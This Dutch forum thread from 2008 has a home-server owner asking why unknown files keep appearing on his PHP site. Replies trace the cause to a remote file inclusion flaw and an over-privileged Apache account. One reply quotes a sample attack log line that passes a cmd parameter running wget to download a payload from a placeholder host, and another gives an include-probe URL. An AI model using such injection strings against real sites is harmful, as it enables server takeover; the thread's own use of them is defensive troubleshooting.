Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

Mijn website is gehackt

Pagina: 1
Acties:

  • Righteye
  • Registratie: Juli 2000
  • Laatst online: 25-11 08:30

Righteye

Mijn rechteroog dus.....

Topicstarter
Allereerst de reden dat ik het hier post en niet in "Beveiliging en virussen" is dat de HK maar beperkt toegankelijk is en mijn posts dus niet meteen via Google te vinden zijn.
Verder zit er een link in die wat vervelend spul zou kunnen bevatten als je niet weet hoe je ermee om moet gaan, aangezien de HK bevolkt wordt door echt computernerds (toch?), leek het me hier minder risico opleveren. :P

Ik ben er nog niet aan toe om het echt een serieus probleem te noemen, ik word keurig gealarmeerd en het wordt in quarantine gezet dus heb er verder niet echt last van.
Maar het begint zo langzamerhand irritant te worden, aangezien me logs zo vol raken. :(

Het leek me ook wel een mooie puzzel/uitdaging voor de HK bewoners :D

Goed hier alle info:
Het gaat om *knip* (website van mijn nageslacht)
Simpele website gebasseerd op PHP/HTML met een MySQL dbase en wat java.

Ik draai hier trouwens op een Apache 2.28 webserver met PHP 4.48 (beide net geinstalleerd) op XP Pro NL SP2 + alle updates tot nu.

Wat gebeurt er:
Er worden bestanden op mijn HD geplaatst door iemand. Ik draai diverse subdomeinen, maar alleen op baby.klappe.nu gebeurt dit.

De bestanden die geplaatst worden zijn iets van een website, althans dat moet het voorstellen. Enkele opvallende bestands- en directory namen: cove, umunuz, namogofer.php en egisu.txt. Verder bestanden met bekendere namen; dummy.htm, check.js, blog.htm.

Als je het opent ziet het er zo uit:
Afbeeldingslocatie: http://www.klappe.nu/hack.jpg

Wat er geupload wordt vind je hier:
[b]LET OP: mijn virusscanner begint aan alle kanten te loeien bij een aantal bestanden in deze zip (VBS: Mailware-gen). Ik heb tot nu toe geen nadelige effecten ondervonden van deze bestanden. Als jij wat anders constateert laat het me weten, dan wis ik de link.*knip*

In mijn eventlogs is niets te zien, mijn virusscanner pikt ze op meteen na de upload en dan worden ze weer verwijdert. De owner is de Administrator group. Administrator heeft een goed wachtwoord, GAST account gedisabled etc. Geen firewall draaien, maar wel achter NAT, waarbij alleen poort 80 geforward wordt naar buiten toe.

De vragen die ik heb:
- Hoe krijgen ze die zooi op mijn PC ?
- Is mijn website dan zo lek als een mandje ?
- Wat doet het wat ze bij mij uploaden ?
- Kan ik nog iets doen om hun te etteren ?

[ Voor 2% gewijzigd door SmartDoDo op 08-03-2008 20:10 ]

Weblog van Righteye's gezinnetje - De grote grappige plaatjes website


  • Victor
  • Registratie: November 2003
  • Niet online
Waarschijnlijk een lek PHP script op een Apache server die onder de Administrator account draait. Het lekke PHP script staat blijkbaar de uploads toe, het feit dat het onder de Administrator account draait zorgt voor de schrijfrechten.

Wat je moet doen:
- Geen lekke PHP scripts online zetten :P
- Je Apache server een eigen account geven met zeer beperkte rechten

[ Voor 76% gewijzigd door Victor op 08-03-2008 19:58 ]


  • LauPro
  • Registratie: Augustus 2001
  • Laatst online: 30-11 12:59

LauPro

Prof Mierenneuke®

Ik zou zeggen gebruik LAMP, desnoods in een VM.

Inkoopacties - HENK terug! - Megabit
It is a war here, so be a general!


  • Victor
  • Registratie: November 2003
  • Niet online
LauPro schreef op zaterdag 08 maart 2008 @ 20:01:
Ik zou zeggen gebruik LAMP, desnoods in een VM.
Even denken... Hij gebruikt Apache, MySQL en PHP... Dus wat je wilt zeggen, is dat hij geen Windows moet gebruiken.

Ok, Righteye, gebruik de tip van LauPro, installeer het onder Linux en laat het daar onder de root account draaien. Dat lost het op.

  • Raven
  • Registratie: November 2004
  • Niet online

Raven

Marion Raven fan

Victor schreef op zaterdag 08 maart 2008 @ 20:02:
[...]

Even denken... Hij gebruikt Apache, MySQL en PHP... Dus wat je wilt zeggen, is dat hij geen Windows moet gebruiken.

Ok, Righteye, gebruik de tip van LauPro, installeer het onder Linux en laat het daar onder de root account draaien. Dat lost het op.
root is toch administrator? Hoe los je het daarmee op :?

After the first glass you see things as you wish they were. After the second you see things as they are not. Finally you see things as they really are, and that is the most horrible thing in the world...

Oscar Wilde


  • anandus
  • Registratie: Februari 2001
  • Niet online
bartgrefte schreef op zaterdag 08 maart 2008 @ 20:07:
[...]

root is toch administrator? Hoe los je het daarmee op :?
Dat is z'n hele punt ;)
Je moet gewoon iets niet onder admin laten draaien :)

"Always remember to quick save" - Sun Tzu


  • SmartDoDo
  • Registratie: Oktober 2002
  • Laatst online: 30-11 19:02

SmartDoDo

Woeptiedoe

De Huiskamer is niet bedoeld voor techvragen. Als je liever niet hebt dat veel mensen gelinkt worden naar je eigen site dan moet je hem maar niet posten. Deze topic gaan naar BV aangezien het daar beter op z'n plek is :)

  • Freakertje
  • Registratie: Januari 2002
  • Laatst online: 30-11 16:31

Freakertje

PC schopt kont, ik nog niet...

Zitten er uploadscripts tussen?
Heb je de maprechten goed staan?
Cross-site scripting uitgesloten?
Op alle invoermogelijkheden een degelijke controle zoals verwijderen van bepaalde tags?
Zal ik nog een half uurtje doorgaan? :+

Ik ga een aantal zaken even helemaal anders doen!
Totale Modjesgekte


  • Shadowman
  • Registratie: Januari 2002
  • Niet online
PHP-scripts moet je iig nalopen, je index.php include zomaar vanalles:
/index.php?cat=http://tweakers.net/?
^ roep die maar eens aan op je site :)

Aangezien dat met include al gebeurd is het mogelijk om een externe php-file te includen en deze uit te laten voeren op je server.

  • Raven
  • Registratie: November 2004
  • Niet online

Raven

Marion Raven fan

anandus schreef op zaterdag 08 maart 2008 @ 20:08:
[...]
Dat is z'n hele punt ;)
Je moet gewoon iets niet onder admin laten draaien :)
Ja ok, dat snapte ik wel, maar lees die zin eens:
Victor schreef op zaterdag 08 maart 2008 @ 20:02:
[...]

Even denken... Hij gebruikt Apache, MySQL en PHP... Dus wat je wilt zeggen, is dat hij geen Windows moet gebruiken.

Ok, Righteye, gebruik de tip van LauPro, installeer het onder Linux en laat het daar onder de root account draaien. Dat lost het op.
Hoort daar niet een woordje "niet" tussen? ;)

[ Voor 4% gewijzigd door Raven op 08-03-2008 20:27 ]

After the first glass you see things as you wish they were. After the second you see things as they are not. Finally you see things as they really are, and that is the most horrible thing in the world...

Oscar Wilde


  • Victor
  • Registratie: November 2003
  • Niet online
bartgrefte schreef op zaterdag 08 maart 2008 @ 20:22:
[...]

Ja ok, dat snapte ik wel, maar lees die zin eens:

[...]

Hoort daar niet een woordje "niet" tussen? ;)
"Sarcasme"

  • Righteye
  • Registratie: Juli 2000
  • Laatst online: 25-11 08:30

Righteye

Mijn rechteroog dus.....

Topicstarter
SmartDoDo schreef op zaterdag 08 maart 2008 @ 20:14:
De Huiskamer is niet bedoeld voor techvragen. Als je liever niet hebt dat veel mensen gelinkt worden naar je eigen site dan moet je hem maar niet posten. Deze topic gaan naar BV aangezien het daar beter op z'n plek is :)
Prima, persoonlijk zag ik het meer als een puzzel, zodoende dat ik voor de HK koos.
Hoe kom je erbij dat ik niet wil dat veel mensen gelinkt worden naar mijn eigen site ?
En nu de links gewist zijn en in elk geval 1 vraag beantwoord kan hier dus een slotje op, aangezien mijn overige vragen zonder links niet te beantwoorden zijn...... :( .
Shadowman schreef op zaterdag 08 maart 2008 @ 20:18:
PHP-scripts moet je iig nalopen, je index.php include zomaar vanalles:
/index.php?cat=http://tweakers.net/?
^ roep die maar eens aan op je site :)

Aangezien dat met include al gebeurd is het mogelijk om een externe php-file te includen en deze uit te laten voeren op je server.
Aj,....das jammer...klopt als een bus. helemaal niet aan gedacht. Achja, aldoende leert men, gebruik die methode al tijden niet meer. Zal het gelijk verbeteren.

[ Voor 57% gewijzigd door Righteye op 08-03-2008 21:14 ]

Weblog van Righteye's gezinnetje - De grote grappige plaatjes website


  • Daywalk3r
  • Registratie: Mei 2005
  • Laatst online: 15-12-2023

Daywalk3r

Walks at night 2

Nu domeinen hebben problemen.
Ligt niet aan jou.. Hebben er meer last van

Hier doet hij het gewoon

[ Voor 15% gewijzigd door Daywalk3r op 09-03-2008 01:23 ]

Is the enemy of my enemy, my friend or my enemy?


  • LauPro
  • Registratie: Augustus 2001
  • Laatst online: 30-11 12:59

LauPro

Prof Mierenneuke®

Victor schreef op zaterdag 08 maart 2008 @ 20:02:
Even denken... Hij gebruikt Apache, MySQL en PHP... Dus wat je wilt zeggen, is dat hij geen Windows moet gebruiken.

Ok, Righteye, gebruik de tip van LauPro, installeer het onder Linux en laat het daar onder de root account draaien. Dat lost het op.
Wel - zonder in een eeuwenlange discussie te belanden - het is mijn ervaring dat Windows-omgevingen inherent onveilig zijn zonder extra tools en/of workarounds. En een standaard LAMP draait apache niet onder root. En zelfs systemen waar dit soms wel gebeurt (DSL) die zijn onder root nog veiliger dan Apache onder een apart windowsaccount ;) .

Inkoopacties - HENK terug! - Megabit
It is a war here, so be a general!


  • Koppensneller
  • Registratie: April 2002
  • Laatst online: 20:51

Koppensneller

winterrrrrr

Daywalk3r schreef op zondag 09 maart 2008 @ 01:22:
Nu domeinen hebben problemen.
Ligt niet aan jou.. Hebben er meer last van

Hier doet hij het gewoon
Hoe kan dat nou in hemelsnaam aan de TLD liggen? :?

  • we_are_borg
  • Registratie: September 2000
  • Laatst online: 30-11 16:02

we_are_borg

You will Comply

Ik zou eerst beginnen met het nakijken van de logboeken, en kijk welke files er op gevraagd zijn. ik heb het namelijk ook een keer gehad dat mijn server werd misbruikt door een foute php code. Let vooral op entrys in logboeken als deze index.php?id=http://xxxx.org/lila.jpg?&cmd=cd%20/tmp;wget%20www.xxxxxxx.xxxxxxx.com.br/r0nin

[PHP] Exploit door verkeerde php code *

Een foute php code en het maakt weinig uit op welke OS je zit, je kan dan gewoon alles open gooien. Kijk ook naar programma's die WAMP of LAMP hardened. Er is een module voor PHP die namelijk hardened deze kan je vinden op http://www.hardened-php.net/home.8.html weet niet of het werkt onder Windows heb alleen ervaring onder Linux ermee.

You need the computing power of a P1, 16 MB RAM and 1 GB Harddisk to run Win95. It took the computing power of 3 Commodore 64 to fly to the Moon. Something is wrong here, and it wasn't the Apollo.


  • Righteye
  • Registratie: Juli 2000
  • Laatst online: 25-11 08:30

Righteye

Mijn rechteroog dus.....

Topicstarter
Righteye schreef op zaterdag 08 maart 2008 @ 21:08:
[...]

Aj,....das jammer...klopt als een bus. helemaal niet aan gedacht. Achja, aldoende leert men, gebruik die methode al tijden niet meer. Zal het gelijk verbeteren.
Het is dus al opgelost, was gewoon erg slecht gecode.

Maar toch bedankt allemaal _/-\o_ _/-\o_

Er mag dus een slotje op.

[ Voor 9% gewijzigd door Righteye op 09-03-2008 09:40 ]

Weblog van Righteye's gezinnetje - De grote grappige plaatjes website

Pagina: 1